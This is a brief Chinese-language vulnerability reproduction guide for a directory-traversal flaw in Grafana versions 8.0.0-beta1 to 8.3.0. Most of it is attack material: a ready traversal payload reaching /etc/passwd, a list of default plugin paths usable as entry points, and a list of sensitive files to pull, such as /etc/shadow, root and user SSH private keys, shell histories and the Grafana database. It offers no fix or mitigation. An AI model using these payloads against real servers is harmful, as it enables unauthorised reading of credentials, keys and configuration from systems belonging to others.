一、漏洞概述
Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是:<ip+端口>/public/plugins/?/
,其中?是任何已安装插件的插件 ID。
二、影响范围
8.0.0-beta1 到 8.3.0
三、访问页面
四、漏洞复现
1、payload
/public/plugins/alertlist/../../../../../../../../etc/passwd
2、默认的可用的插件
/public/plugins/alertGroups
/public/plugins/alertlist
/public/plugins/alertmanager
/public/plugins/annolist
/plugins/barchart
/public/plugins/bargauge
/public/plugins/canvas
/public/plugins/gauge
/public/plugins/cloudwatch
/public/plugins/dashboard
/public/plugins/dashlist
/public/plugins/debug
/public/plugins/elasticsearch
/public/plugins/geomap
/public/plugins/gettingstarted
/public/plugins/grafana-azure-monitor-datasource
/public/plugins/grafana
/public/plugins/graph
/public/plugins/graphite
/public/plugins/heatmap
/public/plugins/histogram
/public/plugins/influxdb
/public/plugins/jaeger
/public/plugins/live
/public/plugins/logs
/public/plugins/loki
/public/plugins/mixed
/public/plugins/mssql
/public/plugins/news
/public/plugins/nodeGraph
/public/plugins/opentsdb
/public/plugins/piechart
/public/plugins/pluginlist
/public/plugins/postgres
/public/plugins/prometheus
/public/plugins/stat
/public/plugins/state-timeline
/public/plugins/status-history
/public/plugins/table-old
/public/plugins/testdata
/public/plugins/table
/public/plugins/tempo
/public/plugins/text
/public/plugins/timeseries
/public/plugins/welcome
/public/plugins/xychart
/public/plugins/zipkin
3、可以查看的敏感信息路径
/conf/defaults.ini
/etc/grafana/grafana.ini
/etc/passwd
/etc/shadow
/home/grafana/.bash_history
/home/grafana/.ssh/id_rsa
/root/.bash_history
/root/.ssh/id_rsa
/usr/local/etc/grafana/grafana.ini
/var/lib/grafana/grafana.db
/proc/net/fib_trie
/proc/net/tcp
/proc/self/cmdline